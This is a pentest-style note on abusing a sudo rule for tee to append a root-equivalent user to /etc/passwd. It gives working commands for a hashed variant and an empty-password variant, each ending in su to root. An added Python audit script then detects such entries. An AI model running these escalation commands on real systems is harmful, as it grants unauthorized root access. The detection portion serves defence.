/usr/bin/tee

Two techniques are listed. The first presupposes an SSH connection as a low-privilege user who is allowed to run /usr/bin/tee through sudo; the second is a standalone chain.

a) Create a SHA-512 crypt password hash (on Kali):

mkpasswd -m sha-512 password123

b) Run this command to specify the file you want to overwrite, in this case the /etc/passwd file:

LFILE=/etc/passwd

Then:

echo 'redcliff:$6$hriigDiWwY0dsyeD$e3rC4zuNw7L7VwJLLrfCJI5X.VuOI0RjBX5vIsH4kQA8CPA9I/052/HoAMsQuFkxNr94AYkhht23RZcBIJ5Il.:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"

The long `$6$...` string (second field) is the SHA-512 hash produced in step a.

`$LFILE` is the file written to (/etc/passwd).

`redcliff` is the new user; the `0:0` UID/GID fields make it a root-equivalent account.

c) Once the line has been appended, switch to the new user with the plaintext password that was hashed in step a:

su redcliff (the new user), password: password123 (the plaintext hashed in step a)

#Alternative:

We can simply append a user to /etc/passwd with an empty password field and UID 0, which makes that user root.

Something like `redcliff::0:0:::/bin/sh`

echo "redcliff::0:0:::/bin/sh" | sudo tee -a /etc/passwd

su redcliff

#root
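Both variants above leave the same fingerprint in /etc/passwd: a second UID-0 account, a password hash stored directly in passwd instead of shadow, or an empty password field. The following audit script is an added example written for this page (not part of the original note) that parses passwd content and reports exactly those anomalies, plus malformed and duplicate entries. The sample input is constructed inline from the two lines shown above; on a real host you would feed it the contents of /etc/passwd. Any sudo rule that grants `tee` (or any other command that writes to arbitrary paths) is equivalent to granting root, so the durable fix is removing the rule; this check is the detection side.

```python
"""Audit /etc/passwd content for root-equivalent or passwordless accounts.

Added example for this page; not the page's own code. The sample below is
constructed: a normal passwd excerpt followed by the two lines the note appends.
"""

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
redcliff:$6$hriigDiWwY0dsyeD$e3rC4zuNw7L7VwJLLrfCJI5X.VuOI0RjBX5vIsH4kQA8CPA9I/052/HoAMsQuFkxNr94AYkhht23RZcBIJ5Il.:0:0:root:/root:/bin/bash
redcliff::0:0:::/bin/sh
"""


def audit_passwd(text):
    """Return a list of (line_number, finding_code, username) tuples.

    Checks performed on every non-empty line:
      malformed      - not exactly 7 colon-separated fields
      non-numeric-uid - third field is not an integer
      uid0-not-root  - UID 0 under a name other than "root"
      empty-password - second field empty (login may need no password)
      hash-in-passwd - second field holds a hash instead of the shadow marker "x"
      duplicate-name - username already seen earlier in the file
    """
    findings = []
    seen = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", raw))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit():
            findings.append((lineno, "non-numeric-uid", name))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, "uid0-not-root", name))
        if pw == "":
            findings.append((lineno, "empty-password", name))
        elif pw != "x" and not pw.startswith(("*", "!")):
            # "x" means the hash lives in /etc/shadow; "*" and "!" lock the account.
            # Anything else is a hash (or junk) placed directly in passwd.
            findings.append((lineno, "hash-in-passwd", name))
        if name in seen:
            findings.append((lineno, "duplicate-name", name))
        seen[name] = lineno
    return findings


def audit_file(path="/etc/passwd"):
    """Convenience wrapper for running the audit on a live system."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, code, who in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {code}: {who}")
```

Run against the constructed sample, it reports five findings, all on the two appended lines: the hashed entry trips `uid0-not-root` and `hash-in-passwd`, and the empty-password entry trips `uid0-not-root`, `empty-password` and `duplicate-name`. A clean baseline (only `root` at UID 0, every second field `x`, `*` or `!`) produces an empty list, so the function can be wired into a periodic integrity check or compared against a stored copy of the file.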
